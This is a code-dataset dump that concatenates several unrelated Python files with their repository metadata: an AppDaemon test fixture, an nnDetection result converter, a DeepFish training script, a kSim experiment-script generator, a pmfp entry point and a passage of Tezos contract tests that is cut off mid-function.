from pytest import MonkeyPatch
from tests.test_utils import fake_fn
async def fake_run_in(
    self: Controller, fn: Callable[..., Any], delay: float, **kwargs: Any
) -> "Task[None]":
    """Stand-in for AppDaemon's ``run_in``: schedule ``fn`` after ``delay`` seconds.

    The callback receives its keyword arguments as a single dict, and the
    scheduled :class:`asyncio.Task` is returned so callers can cancel it.
    """

    async def delayed_call() -> None:
        await asyncio.sleep(delay)
        await fn(kwargs)

    return asyncio.create_task(delayed_call())
async def fake_cancel_timer(self: Controller, task: "Task[None]") -> bool:
    """Stand-in for AppDaemon's ``cancel_timer``: cancel the scheduled task."""
    was_cancelled = task.cancel()
    return was_cancelled
@pytest.fixture(autouse=True)
def hass_mock(monkeypatch: MonkeyPatch) -> None:
    """
    Fixture for set up the tests, mocking appdaemon functions
    """
    # Async AppDaemon entry points are replaced with async fakes.
    async_targets = [
        (hass.Hass, "listen_event"),
        (mqtt.Mqtt, "listen_event"),
        (hass.Hass, "listen_state"),
        (hass.Hass, "call_service"),
    ]
    monkeypatch.setattr(hass.Hass, "__init__", fake_fn())
    for owner, attr in async_targets:
        monkeypatch.setattr(owner, attr, fake_fn(async_=True))
    # Sync helpers, a pinned AppDaemon version, and scheduling fakes.
    monkeypatch.setattr(hass.Hass, "log", fake_fn())
    monkeypatch.setattr(hass.Hass, "get_ad_version", fake_fn(to_return="4.0.0"))
    monkeypatch.setattr(hass.Hass, "run_in", fake_run_in)
    monkeypatch.setattr(hass.Hass, "cancel_timer", fake_cancel_timer)
from asyncio import Task
from typing import Any, Callable
import appdaemon.plugins.hass.hassapi as hass
import appdaemon.plugins.mqtt.mqttapi as mqtt
import pytest
from cx_core import Controller
from pytest import MonkeyPatch
from tests.test_utils import fake_fn
async def fake_run_in(
self: Controller, fn: Callable[..., Any], delay: float, **kwargs: Any
) -> "Task[None]":
async def inner() -> None:
await asyncio.sleep(delay)
await fn(kwargs)
task = asyncio.create_task(inner())
return task
async def fake_cancel_timer(self: Controller, task: "Task[None]") -> bool:
return task.cancel()
@pytest.fixture(autouse=True)
def hass_mock(monkeypatch: MonkeyPatch) -> None:
monkeypatch.setattr(hass.Hass, "__init__", fake_fn())
monkeypatch.setattr(hass.Hass, "listen_event", fake_fn(async_=True))
monkeypatch.setattr(mqtt.Mqtt, "listen_event", fake_fn(async_=True))
monkeypatch.setattr(hass.Hass, "listen_state", fake_fn(async_=True))
monkeypatch.setattr(hass.Hass, "log", fake_fn())
monkeypatch.setattr(hass.Hass, "call_service", fake_fn(async_=True))
monkeypatch.setattr(hass.Hass, "get_ad_version", fake_fn(to_return="4.0.0"))
monkeypatch.setattr(hass.Hass, "run_in", fake_run_in)
monkeypatch.setattr(hass.Hass, "cancel_timer", fake_cancel_timer)
| true | true |
f7104045e9f92729e7e05787170a633970a9e9c2 | 921 | py | Python | projects/Task019_ADAM/submission/scripts/convert.py | joeranbosma/nnDetection | 2ebbf1cdc8a8794c73e325f06fea50632c78ae8c | [
"BSD-3-Clause"
] | 242 | 2021-05-17T12:31:39.000Z | 2022-03-31T11:51:29.000Z | projects/Task019_ADAM/submission/scripts/convert.py | joeranbosma/nnDetection | 2ebbf1cdc8a8794c73e325f06fea50632c78ae8c | [
"BSD-3-Clause"
] | 59 | 2021-06-02T07:32:10.000Z | 2022-03-31T18:45:52.000Z | projects/Task019_ADAM/submission/scripts/convert.py | joeranbosma/nnDetection | 2ebbf1cdc8a8794c73e325f06fea50632c78ae8c | [
"BSD-3-Clause"
] | 38 | 2021-05-31T14:01:37.000Z | 2022-03-21T08:24:40.000Z | import argparse
from pathlib import Path
from nndet.io import load_pickle
from nndet.core.boxes.ops_np import box_center_np
# Minimum detection score for a box to be reported.
THRESHOLD = 0.5


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('source', type=Path)
    args = parser.parse_args()
    source = args.source

    # Load the predicted boxes/scores produced for this case.
    predictions = load_pickle(source / "case_boxes.pkl")
    boxes = predictions["pred_boxes"]
    scores = predictions["pred_scores"]

    # Keep only confident detections and reduce each box to its center.
    boxes = boxes[scores > THRESHOLD]
    centers = box_center_np(boxes) if boxes.size > 0 else []

    with open(source / "result.txt", "a") as f:
        # One "c2, c1, c0" line per detection (axis order reversed —
        # presumably zyx -> xyz; confirm against the challenge format),
        # with no trailing newline after the last entry.
        rows = [
            f"{round(float(c[2]))}, {round(float(c[1]))}, {round(float(c[0]))}"
            for c in centers
        ]
        f.write("\n".join(rows))
from pathlib import Path
from nndet.io import load_pickle
from nndet.core.boxes.ops_np import box_center_np
THRESHOLD = 0.5
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('source', type=Path)
args = parser.parse_args()
source = args.source
predictions = load_pickle(source / "case_boxes.pkl")
boxes = predictions["pred_boxes"]
scores = predictions["pred_scores"]
keep = scores > THRESHOLD
boxes = boxes[keep]
if boxes.size > 0:
centers = box_center_np(boxes)
else:
centers = []
with open(source / "result.txt", "a") as f:
if len(centers) > 0:
for c in centers[:-1]:
f.write(f"{round(float(c[2]))}, {round(float(c[1]))}, {round(float(c[0]))}\n")
c = centers[-1]
f.write(f"{round(float(c[2]))}, {round(float(c[1]))}, {round(float(c[0]))}")
| true | true |
f710422e65197ad6adf1832fd2c1d64dfa3c8bbc | 5,612 | py | Python | trainval.py | DoranLyong/DeepFish | 3ea3e13653f708d4a8dcb54b990dcc2997edf4e9 | [
"MIT"
] | 1 | 2020-12-14T21:30:19.000Z | 2020-12-14T21:30:19.000Z | trainval.py | DoranLyong/DeepFish | 3ea3e13653f708d4a8dcb54b990dcc2997edf4e9 | [
"MIT"
] | null | null | null | trainval.py | DoranLyong/DeepFish | 3ea3e13653f708d4a8dcb54b990dcc2997edf4e9 | [
"MIT"
] | null | null | null | import torch
import numpy as np
import argparse
import pandas as pd
import sys
import os
from torch import nn
from torch.nn import functional as F
import tqdm
import pprint
from src import utils as ut
import torchvision
from haven import haven_utils as hu
from haven import haven_chk as hc
from src import datasets, models
from torch.utils.data import DataLoader
import exp_configs
from torch.utils.data.sampler import RandomSampler
from src import wrappers
def trainval(exp_dict, savedir_base, reset, metrics_flag=True, datadir=None, cuda=False):
    """Train and validate a single experiment, checkpointing every epoch.

    Args:
        exp_dict: experiment configuration dict; its hash names the save folder.
        savedir_base: base directory under which the experiment folder is created.
        reset: if truthy, delete (with backup) any previous run of this experiment.
        metrics_flag: unused; kept for backward compatibility with callers.
        datadir: root directory of the dataset.
        cuda: if truthy, run on GPU (asserts CUDA is available).
    """
    # Bookkeeping
    # ---------------
    # get experiment directory
    exp_id = hu.hash_dict(exp_dict)
    savedir = os.path.join(savedir_base, exp_id)

    if reset:
        # delete and backup experiment
        hc.delete_experiment(savedir, backup_flag=True)

    # create folder and save the experiment dictionary
    os.makedirs(savedir, exist_ok=True)
    hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
    # BUG FIX: pprint.pprint() prints and returns None, so the original
    # print(pprint.pprint(...)) emitted a stray "None" line.
    pprint.pprint(exp_dict)
    print('Experiment saved in %s' % savedir)

    # set seed for reproducibility
    # ==================
    seed = 42
    np.random.seed(seed)
    torch.manual_seed(seed)
    if cuda:
        device = 'cuda'
        torch.cuda.manual_seed_all(seed)
        assert torch.cuda.is_available(), 'cuda is not available, please run with "-c 0"'
    else:
        device = 'cpu'

    print('Running on device: %s' % device)

    # Dataset
    # Load val set and train set
    val_set = datasets.get_dataset(dataset_name=exp_dict["dataset"], split="val",
                                   transform=exp_dict.get("transform"),
                                   datadir=datadir)
    train_set = datasets.get_dataset(dataset_name=exp_dict["dataset"],
                                     split="train",
                                     transform=exp_dict.get("transform"),
                                     datadir=datadir)

    # Load train loader, val loader, and vis loader.  The train sampler draws
    # with replacement so every epoch has a fixed number of iterations
    # regardless of the dataset size.
    train_loader = DataLoader(train_set,
                              sampler=RandomSampler(train_set,
                                                    replacement=True,
                                                    num_samples=max(min(500, len(train_set)),
                                                                    len(val_set))),
                              batch_size=exp_dict["batch_size"])

    val_loader = DataLoader(val_set, shuffle=False, batch_size=exp_dict["batch_size"])
    vis_loader = DataLoader(val_set, sampler=ut.SubsetSampler(train_set,
                                                              indices=[0, 1, 2]),
                            batch_size=1)

    # Create model, opt, wrapper.
    # BUG FIX: the original called .cuda() unconditionally, which ignored the
    # computed `device` and broke the CPU path ("-c 0"); .to(device) honors it.
    model_original = models.get_model(exp_dict["model"], exp_dict=exp_dict).to(device)
    opt = torch.optim.Adam(model_original.parameters(),
                           lr=1e-5, weight_decay=0.0005)
    model = wrappers.get_wrapper(exp_dict["wrapper"], model=model_original, opt=opt).to(device)

    score_list = []

    # Checkpointing
    # =============
    score_list_path = os.path.join(savedir, "score_list.pkl")
    model_path = os.path.join(savedir, "model_state_dict.pth")
    opt_path = os.path.join(savedir, "opt_state_dict.pth")

    if os.path.exists(score_list_path):
        # resume experiment; map_location lets GPU-saved checkpoints load on CPU
        score_list = ut.load_pkl(score_list_path)
        model.load_state_dict(torch.load(model_path, map_location=device))
        opt.load_state_dict(torch.load(opt_path, map_location=device))
        s_epoch = score_list[-1]["epoch"] + 1
    else:
        # restart experiment
        score_list = []
        s_epoch = 0

    # Run training and validation
    for epoch in range(s_epoch, exp_dict["max_epoch"]):
        score_dict = {"epoch": epoch}

        # visualize
        # model.vis_on_loader(vis_loader, savedir=os.path.join(savedir, "images"))

        # validate
        score_dict.update(model.val_on_loader(val_loader))

        # train
        score_dict.update(model.train_on_loader(train_loader))

        # Add score_dict to score_list
        score_list += [score_dict]

        # Report and save the latest scores plus model/optimizer state.
        print(pd.DataFrame(score_list).tail())
        hu.save_pkl(score_list_path, score_list)
        hu.torch_save(model_path, model.state_dict())
        hu.torch_save(opt_path, opt.state_dict())
        print("Saved in %s" % savedir)
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    # -e: experiment group names defined in exp_configs.EXP_GROUPS
    parser.add_argument('-e', '--exp_group_list', nargs='+')
    # -sb: base directory where each experiment folder is written
    parser.add_argument('-sb', '--savedir_base', required=True)
    # -d: dataset root directory
    parser.add_argument('-d', '--datadir', required=True)
    # -r: 1 to delete (with backup) and restart the experiment
    parser.add_argument('-r', '--reset', default=0, type=int)
    # -ei: resume a single experiment by its hash id
    parser.add_argument('-ei', '--exp_id', default=None)
    # -c: 1 to run on GPU, 0 to run on CPU
    parser.add_argument('-c', '--cuda', type=int, default=1)

    args = parser.parse_args()

    # Collect experiments
    # -------------------
    if args.exp_id is not None:
        # select one experiment: reload its saved config from disk
        savedir = os.path.join(args.savedir_base, args.exp_id)
        exp_dict = hu.load_json(os.path.join(savedir, 'exp_dict.json'))

        exp_list = [exp_dict]

    else:
        # select exp group(s): gather every config in the requested groups
        exp_list = []
        for exp_group_name in args.exp_group_list:
            exp_list += exp_configs.EXP_GROUPS[exp_group_name]

    # Run experiments
    # ----------------------------
    for exp_dict in exp_list:
        # do trainval for one configuration
        trainval(exp_dict=exp_dict,
                 savedir_base=args.savedir_base,
                 reset=args.reset,
                 datadir=args.datadir,
                 cuda=args.cuda)
| 32.818713 | 91 | 0.596044 | import torch
import numpy as np
import argparse
import pandas as pd
import sys
import os
from torch import nn
from torch.nn import functional as F
import tqdm
import pprint
from src import utils as ut
import torchvision
from haven import haven_utils as hu
from haven import haven_chk as hc
from src import datasets, models
from torch.utils.data import DataLoader
import exp_configs
from torch.utils.data.sampler import RandomSampler
from src import wrappers
def trainval(exp_dict, savedir_base, reset, metrics_flag=True, datadir=None, cuda=False):
    """Train and validate one experiment described by ``exp_dict``.

    Args:
        exp_dict: experiment hyper-parameters (keys used here: "dataset",
            "model", "wrapper", "batch_size", "max_epoch", optional
            "transform").
        savedir_base: root directory; results go to ``savedir_base/<hash>``
            where the hash is derived from ``exp_dict``.
        reset: when truthy, delete (with backup) any previous results.
        metrics_flag: unused here; kept for interface compatibility.
        datadir: directory containing the datasets.
        cuda: run on GPU when truthy (asserts CUDA is available).
    """
    # Each experiment is addressed by the hash of its config dict.
    exp_id = hu.hash_dict(exp_dict)
    savedir = os.path.join(savedir_base, exp_id)
    if reset:
        hc.delete_experiment(savedir, backup_flag=True)
    os.makedirs(savedir, exist_ok=True)
    hu.save_json(os.path.join(savedir, 'exp_dict.json'), exp_dict)
    # BUGFIX: pprint.pprint() prints and returns None; wrapping it in
    # print() used to emit a spurious "None" line.
    pprint.pprint(exp_dict)
    print('Experiment saved in %s' % savedir)
    # Fix seeds for reproducibility.
    seed = 42
    np.random.seed(seed)
    torch.manual_seed(seed)
    if cuda:
        device = 'cuda'
        torch.cuda.manual_seed_all(seed)
        # BUGFIX: the comma in the error message was misplaced
        # ("cuda is not, available").
        assert torch.cuda.is_available(), 'cuda is not available, please run with "-c 0"'
    else:
        device = 'cpu'
    print('Running on device: %s' % device)
    # Datasets and loaders.
    val_set = datasets.get_dataset(dataset_name=exp_dict["dataset"], split="val",
                                   transform=exp_dict.get("transform"),
                                   datadir=datadir)
    train_set = datasets.get_dataset(dataset_name=exp_dict["dataset"],
                                     split="train",
                                     transform=exp_dict.get("transform"),
                                     datadir=datadir)
    # Sample with replacement so an "epoch" has a bounded, comparable size:
    # at least len(val_set) samples, and at most 500 (or len(train_set)).
    train_loader = DataLoader(train_set,
                              sampler=RandomSampler(
                                  train_set, replacement=True,
                                  num_samples=max(min(500, len(train_set)),
                                                  len(val_set))),
                              batch_size=exp_dict["batch_size"])
    val_loader = DataLoader(val_set, shuffle=False, batch_size=exp_dict["batch_size"])
    # Small fixed subset used for visualization.
    vis_loader = DataLoader(val_set, sampler=ut.SubsetSampler(train_set,
                                                              indices=[0, 1, 2]),
                            batch_size=1)
    # Model, optimizer, and training wrapper.
    model_original = models.get_model(exp_dict["model"], exp_dict=exp_dict).cuda()
    opt = torch.optim.Adam(model_original.parameters(),
                           lr=1e-5, weight_decay=0.0005)
    model = wrappers.get_wrapper(exp_dict["wrapper"], model=model_original, opt=opt).cuda()
    # Resume from a checkpoint when one exists, otherwise start fresh.
    score_list = []
    score_list_path = os.path.join(savedir, "score_list.pkl")
    model_path = os.path.join(savedir, "model_state_dict.pth")
    opt_path = os.path.join(savedir, "opt_state_dict.pth")
    if os.path.exists(score_list_path):
        score_list = ut.load_pkl(score_list_path)
        model.load_state_dict(torch.load(model_path))
        opt.load_state_dict(torch.load(opt_path))
        s_epoch = score_list[-1]["epoch"] + 1
    else:
        score_list = []
        s_epoch = 0
    # Main loop: validate, then train, then checkpoint, every epoch.
    for epoch in range(s_epoch, exp_dict["max_epoch"]):
        score_dict = {"epoch": epoch}
        score_dict.update(model.val_on_loader(val_loader))
        score_dict.update(model.train_on_loader(train_loader))
        score_list += [score_dict]
        print(pd.DataFrame(score_list).tail())
        hu.save_pkl(score_list_path, score_list)
        hu.torch_save(model_path, model.state_dict())
        hu.torch_save(opt_path, opt.state_dict())
        print("Saved in %s" % savedir)
if __name__ == '__main__':
    # Command-line entry point: select which experiments to run.
    parser = argparse.ArgumentParser()
    parser.add_argument('-e', '--exp_group_list', nargs='+')
    parser.add_argument('-sb', '--savedir_base', required=True)
    parser.add_argument('-d', '--datadir', required=True)
    parser.add_argument('-r', '--reset', default=0, type=int)
    parser.add_argument('-ei', '--exp_id', default=None)
    parser.add_argument('-c', '--cuda', type=int, default=1)
    args = parser.parse_args()
    # Either resume a single experiment identified by its hash id ...
    if args.exp_id is not None:
        savedir = os.path.join(args.savedir_base, args.exp_id)
        exp_dict = hu.load_json(os.path.join(savedir, 'exp_dict.json'))
        exp_list = [exp_dict]
    else:
        # ... or run every experiment of the requested groups.
        exp_list = []
        for exp_group_name in args.exp_group_list:
            exp_list += exp_configs.EXP_GROUPS[exp_group_name]
    # Launch training/validation for each selected experiment.
    for exp_dict in exp_list:
        trainval(exp_dict=exp_dict,
                 savedir_base=args.savedir_base,
                 reset=args.reset,
                 datadir=args.datadir,
                 cuda=args.cuda)
| true | true |
f71042b95d0705e8bfa06f237b0c7ba6890bd92a | 3,484 | py | Python | scripts/gen_ksim_outside_exp.py | ctring/konex | 7bf55f68f9ddcba6e2007e9c8049899cdb707d69 | [
"MIT"
] | null | null | null | scripts/gen_ksim_outside_exp.py | ctring/konex | 7bf55f68f9ddcba6e2007e9c8049899cdb707d69 | [
"MIT"
] | null | null | null | scripts/gen_ksim_outside_exp.py | ctring/konex | 7bf55f68f9ddcba6e2007e9c8049899cdb707d69 | [
"MIT"
] | null | null | null | #!/usr/bin/python
'''
Generate a command file for automated kSim experiment with out-of-dataset queries
Example:
./gen_ksim_outside_exp.py 10 10 dataset.txt 0.3 experiment.txt results.txt -k 1 3 5 7 -m 7 --seed 23 -n 10
'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import random
def pick_random(count, length, min_length=2, n=10):
picked = []
for i in range(n):
idx = random.randint(0, count - 1)
start = random.randint(0, length - min_length)
end = start + random.randint(min_length, length - start)
picked.append((idx, start, end))
return picked
if __name__ == '__main__':
    # CLI: pick random query subsequences and emit a K-ONEX script that
    # runs testSim over every (PAA block size, k, subsequence) combination.
    parser = argparse.ArgumentParser(description='Picks random time series given the '
                                                 'dimension of a dataset.')
    parser.add_argument('count', type=int, help='number of items in the query set.')
    parser.add_argument('length', type=int, help='length of each item in the dataset.')
    parser.add_argument('ds_path', help='path to the dataset used in the experiment')
    parser.add_argument('q_path', help='path to the query file used in the experiment')
    parser.add_argument('st', type=float, help='similarity threshold for the experiment')
    parser.add_argument('exp_path', help='path to the K-ONEX experiment script')
    parser.add_argument('exp_result_path', help='path for the result file')
    parser.add_argument('-k', nargs='+',
                        help='number of similar time series to look for.'
                             'Multiple values can be specified (separated by space).')
    parser.add_argument('-m', help='maximum number of multiple of h '
                                   '(number of time series to be examined).')
    parser.add_argument('-n', type=int, default=10,
                        help='number of sequences to be picked (default: 10).')
    parser.add_argument('--paa', type=int, nargs='+',
                        help='block sizes for PAA.')
    parser.add_argument('--seed', type=int,
                        help='seed for the random number generator.')
    parser.add_argument('--min-length', type=int, default=10,
                        help='minimum length of each sequence (default: 10).')
    parser.add_argument('--fmt', default='{0} [{1}, {2}]',
                        help='python format for output (default: {0} [{1}, {2}])')
    args = parser.parse_args()

    # Reproducible subsequence selection.
    random.seed(args.seed)
    picked = pick_random(args.count, args.length, args.min_length, args.n)
    for item in picked:
        print(args.fmt.format(item[0], item[1], item[2]))
    print()

    with open(args.exp_path, 'w') as script:
        print('load {}'.format(args.ds_path), file=script)
        print('load {}'.format(args.q_path), file=script)
        group_file = '%s_GROUPS_%.1f' % (args.ds_path, args.st)
        if os.path.exists(group_file):
            # Reuse previously computed groups when a cache file exists.
            print('loadGroup 0 {}'.format(group_file), file=script)
        else:
            print('group 0 {}'.format(args.st), file=script)
            print('saveGroup 0 {}'.format(group_file), file=script)
        print('testSim {}'.format(args.exp_result_path), file=script)
        # NOTE(review): --paa has no default, so omitting it leaves
        # args.paa as None and this loop raises TypeError; the example in
        # the module docstring omits --paa -- consider adding a default.
        # Behavior preserved as-is here.
        for block_size in args.paa:
            for k in args.k:
                for item in picked:
                    print('testSim {} {} {} 0 1 {} {} {}'.format(
                        k, args.m, block_size, item[0], item[1], item[2]),
                        file=script)
    print('Experiment script is generated at {}'.format(args.exp_path))
| 43.55 | 110 | 0.602755 |
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import os
import random
def pick_random(count, length, min_length=2, n=10):
    """Pick ``n`` random (series index, start, end) triples.

    ``count`` is the number of series in the dataset and ``length`` their
    common length; each picked subrange is at least ``min_length`` long
    and its bounds stay within ``[0, length]``.  Uses the module-level
    ``random`` state, so seeding makes the result reproducible.
    """
    picked = []
    for i in range(n):
        idx = random.randint(0, count - 1)
        start = random.randint(0, length - min_length)
        # start <= length - min_length guarantees end <= length.
        end = start + random.randint(min_length, length - start)
        picked.append((idx, start, end))
    return picked
if __name__ == '__main__':
    # CLI: pick random query subsequences and emit a K-ONEX script that
    # runs testSim for every (PAA block size, k, subsequence) combination.
    parser = argparse.ArgumentParser(description='Picks random time series given the '
                                     'dimension of a dataset.')
    parser.add_argument('count', type=int, help='number of items in the query set.')
    parser.add_argument('length', type=int, help='length of each item in the dataset.')
    parser.add_argument('ds_path', help='path to the dataset used in the experiment')
    parser.add_argument('q_path', help='path to the query file used in the experiment')
    parser.add_argument('st', type=float, help='similarity threshold for the experiment')
    parser.add_argument('exp_path', help='path to the K-ONEX experiment script')
    parser.add_argument('exp_result_path', help='path for the result file')
    parser.add_argument('-k', nargs='+',
                        help='number of similar time series to look for.'
                        'Multiple values can be specified (separated by space).')
    parser.add_argument('-m', help='maximum number of multiple of h '
                        '(number of time series to be examined).')
    parser.add_argument('-n', type=int, default=10,
                        help='number of sequences to be picked (default: 10).')
    parser.add_argument('--paa', type=int, nargs='+',
                        help='block sizes for PAA.')
    parser.add_argument('--seed', type=int,
                        help='seed for the random number generator.')
    parser.add_argument('--min-length', type=int, default=10,
                        help='minimum length of each sequence (default: 10).')
    parser.add_argument('--fmt', default='{0} [{1}, {2}]',
                        help='python format for output (default: {0} [{1}, {2}])')
    args = parser.parse_args()
    # Reproducible subsequence selection.
    random.seed(args.seed)
    seq = pick_random(args.count, args.length, args.min_length, args.n)
    for s in seq:
        print(args.fmt.format(s[0], s[1], s[2]))
    print()
    with open(args.exp_path, 'w') as f:
        print('load {}'.format(args.ds_path), file=f)
        print('load {}'.format(args.q_path), file=f)
        group_file = '%s_GROUPS_%.1f' % (args.ds_path, args.st)
        if os.path.exists(group_file):
            # Reuse previously computed groups when a cache file exists.
            print('loadGroup 0 {}'.format(group_file), file=f)
        else:
            print('group 0 {}'.format(args.st), file=f)
            print('saveGroup 0 {}'.format(group_file), file=f)
        print('testSim {}'.format(args.exp_result_path), file=f)
        # NOTE(review): --paa has no default, so omitting it makes
        # args.paa None and this loop raises TypeError -- confirm intent.
        for b in args.paa:
            for k in args.k:
                for s in seq:
                    print('testSim {} {} {} 0 1 {} {} {}'.format(k, args.m, b, s[0], s[1], s[2]),
                          file=f)
    print('Experiment script is generated at {}'.format(args.exp_path))
| true | true |
f71042eebecd3985f43d5e37331634edf3eff6ca | 407 | py | Python | pmfp/__main__.py | Python-Tools/pmfp | 832273890eec08e84f9c68d03f3316b2c8139133 | [
"MIT"
] | 4 | 2017-09-15T03:38:56.000Z | 2019-12-16T02:03:14.000Z | pmfp/__main__.py | Python-Tools/pmfp | 832273890eec08e84f9c68d03f3316b2c8139133 | [
"MIT"
] | 1 | 2021-04-27T10:51:42.000Z | 2021-04-27T10:51:42.000Z | pmfp/__main__.py | Python-Tools/pmfp | 832273890eec08e84f9c68d03f3316b2c8139133 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""PMFP.
一个项目管理脚手架.
"""
import warnings
from .entrypoint import ppm
import sys
from typing import List
from pmfp.entrypoint import ppm
from colorama import init
init()
def main(argv: List[str] = sys.argv[1:]) -> None:
    """Service entry point; delegates to the ``ppm`` command dispatcher.

    Configuration override order (highest priority first): environment
    variables > command-line arguments > config file given via '-c' >
    config file at the project launch directory > built-in defaults.
    """
    ppm(argv)


if __name__ == "__main__":
    main(sys.argv[1:])
| 15.074074 | 56 | 0.658477 |
import warnings
from .entrypoint import ppm
import sys
from typing import List
from pmfp.entrypoint import ppm
from colorama import init
init()
def main(argv: List[str] = sys.argv[1:]) -> None:
    """Service entry point; delegates to the ``ppm`` command dispatcher.

    NOTE(review): the default binds ``sys.argv[1:]`` once at import time;
    the ``__main__`` guard below passes it explicitly anyway.
    """
    ppm(argv)
    return None
if __name__ == "__main__":
    main(sys.argv[1:])
| true | true |
f710440ca35c421c0923057216c8cf72bdf47d8b | 57,471 | py | Python | tests_python/tests_009/test_contract.py | ulrikstrid/tezos | 96d4653ba4fb48eccdd0ca309c98254c39396712 | [
"MIT"
] | null | null | null | tests_python/tests_009/test_contract.py | ulrikstrid/tezos | 96d4653ba4fb48eccdd0ca309c98254c39396712 | [
"MIT"
] | null | null | null | tests_python/tests_009/test_contract.py | ulrikstrid/tezos | 96d4653ba4fb48eccdd0ca309c98254c39396712 | [
"MIT"
] | null | null | null | import os
import re
import json
import itertools
from typing import List, Union, Any
import pytest
from client.client import Client
from tools import utils
from tools.constants import IDENTITIES
from .contract_paths import (
CONTRACT_PATH,
ILLTYPED_CONTRACT_PATH,
all_contracts,
all_legacy_contracts,
)
def file_basename(path):
    """Return the final component of *path* without its last extension."""
    final_component = os.path.basename(path)
    stem, _extension = os.path.splitext(final_component)
    return stem
# Generic helper: originate a contract, bake the block, and check that the
# origination operation made it into the chain.
def originate(
    client,
    session,
    contract,
    init_storage,
    amount,
    contract_name=None,
    sender='bootstrap1',
    baker='bootstrap5',
    arguments=None,
):
    """Originate ``contract`` with ``init_storage`` and ``amount`` tez.

    The originated address is stored in ``session['contract']`` and the
    origination result is returned.  ``contract_name`` defaults to the
    contract file's basename; ``arguments`` are extra CLI flags.
    """
    if contract_name is None:
        contract_name = file_basename(contract)
    cli_args = ['--init', init_storage, '--burn-cap', '10.0']
    if arguments is not None:
        cli_args += arguments
    result = client.originate(contract_name, amount, sender, contract, cli_args)
    session['contract'] = result.contract
    print(result.contract)
    # Bake so the origination is included, then verify inclusion.
    utils.bake(client, baker)
    assert utils.check_block_contains_operations(
        client, [result.operation_hash]
    )
    return result
@pytest.mark.contract
@pytest.mark.incremental
class TestManager:
    """Exercise the manager.tz contract: origination, (un)delegation and
    transfers between implicit accounts and originated contracts.

    Tests are incremental: each step relies on the chain state left by
    the previous one, and a block is baked after every operation.
    Fee and gas-limit constants below are the exact values expected for
    these operations; they must be updated if the gas/fee model changes.
    """

    def test_manager_origination(self, client: Client, session: dict):
        path = os.path.join(CONTRACT_PATH, 'entrypoints', 'manager.tz')
        pubkey = IDENTITIES['bootstrap2']['identity']
        originate(client, session, path, f'"{pubkey}"', 1000)
        originate(
            client, session, path, f'"{pubkey}"', 1000, contract_name="manager2"
        )

    def test_delegatable_origination(self, client: Client, session: dict):
        path = os.path.join(
            CONTRACT_PATH, 'entrypoints', 'delegatable_target.tz'
        )
        pubkey = IDENTITIES['bootstrap2']['identity']
        originate(
            client, session, path, f'Pair "{pubkey}" (Pair "hello" 45)', 1000
        )

    def test_target_with_entrypoints_origination(self, client: Client, session):
        path = os.path.join(
            CONTRACT_PATH, 'entrypoints', 'big_map_entrypoints.tz'
        )
        originate(
            client, session, path, 'Pair {} {}', 1000, contract_name='target'
        )

    def test_target_without_entrypoints_origination(
        self, client: Client, session
    ):
        path = os.path.join(
            CONTRACT_PATH, 'entrypoints', 'no_entrypoint_target.tz'
        )
        originate(
            client,
            session,
            path,
            'Pair "hello" 42',
            1000,
            contract_name='target_no_entrypoints',
        )

    def test_target_without_default_origination(self, client: Client, session):
        path = os.path.join(
            CONTRACT_PATH, 'entrypoints', 'no_default_target.tz'
        )
        originate(
            client,
            session,
            path,
            'Pair "hello" 42',
            1000,
            contract_name='target_no_default',
        )

    def test_target_with_root_origination(self, client: Client, session):
        path = os.path.join(CONTRACT_PATH, 'entrypoints', 'rooted_target.tz')
        originate(
            client,
            session,
            path,
            'Pair "hello" 42',
            1000,
            contract_name='rooted_target',
        )

    def test_manager_set_delegate(self, client: Client):
        # Set a delegate, then change it, checking the delegate each time.
        client.set_delegate('manager', 'bootstrap2', [])
        utils.bake(client, 'bootstrap5')
        bootstrap2_pkh = IDENTITIES['bootstrap2']['identity']
        client.set_delegate('delegatable_target', bootstrap2_pkh, [])
        utils.bake(client, 'bootstrap5')
        delegate = IDENTITIES['bootstrap2']['identity']
        assert client.get_delegate('manager', []).delegate == delegate
        assert (
            client.get_delegate('delegatable_target', []).delegate == delegate
        )
        client.set_delegate('manager', 'bootstrap3', [])
        utils.bake(client, 'bootstrap5')
        client.set_delegate('delegatable_target', 'bootstrap3', [])
        utils.bake(client, 'bootstrap5')
        delegate = IDENTITIES['bootstrap3']['identity']
        assert client.get_delegate('manager', []).delegate == delegate
        assert (
            client.get_delegate('delegatable_target', []).delegate == delegate
        )

    def test_manager_withdraw_delegate(self, client: Client):
        # Removing the delegate leaves both contracts undelegated.
        client.withdraw_delegate('manager', [])
        utils.bake(client, 'bootstrap5')
        client.withdraw_delegate('delegatable_target', [])
        utils.bake(client, 'bootstrap5')
        assert client.get_delegate('manager', []).delegate is None
        assert client.get_delegate('delegatable_target', []).delegate is None

    def test_transfer_to_manager(self, client: Client):
        balance = client.get_mutez_balance('manager')
        balance_bootstrap = client.get_mutez_balance('bootstrap2')
        amount = 10.001
        amount_mutez = utils.mutez_of_tez(amount)
        client.transfer(
            amount,
            'bootstrap2',
            'manager',
            ['--gas-limit', f'{128 * 15450 + 108}'],
        )
        utils.bake(client, 'bootstrap5')
        new_balance = client.get_mutez_balance('manager')
        new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
        # Exact expected fee for this operation, in tez.
        fee = 0.000548
        fee_mutez = utils.mutez_of_tez(fee)
        assert balance + amount_mutez == new_balance
        assert (
            balance_bootstrap - fee_mutez - amount_mutez
            == new_balance_bootstrap
        )

    def test_simple_transfer_from_manager_to_implicit(self, client: Client):
        balance = client.get_mutez_balance('manager')
        balance_bootstrap = client.get_mutez_balance('bootstrap2')
        amount = 10.1
        amount_mutez = utils.mutez_of_tez(amount)
        client.transfer(
            amount,
            'manager',
            'bootstrap2',
            ['--gas-limit', f'{128 * 26350 + 12}'],
        )
        utils.bake(client, 'bootstrap5')
        new_balance = client.get_mutez_balance('manager')
        new_balance_bootstrap = client.get_mutez_balance('bootstrap2')
        # Exact expected fee for this operation, in tez.
        fee = 0.000794
        fee_mutez = utils.mutez_of_tez(fee)
        assert balance - amount_mutez == new_balance
        assert (
            balance_bootstrap + amount_mutez - fee_mutez
            == new_balance_bootstrap
        )

    def test_transfer_from_manager_to_manager(self, client: Client):
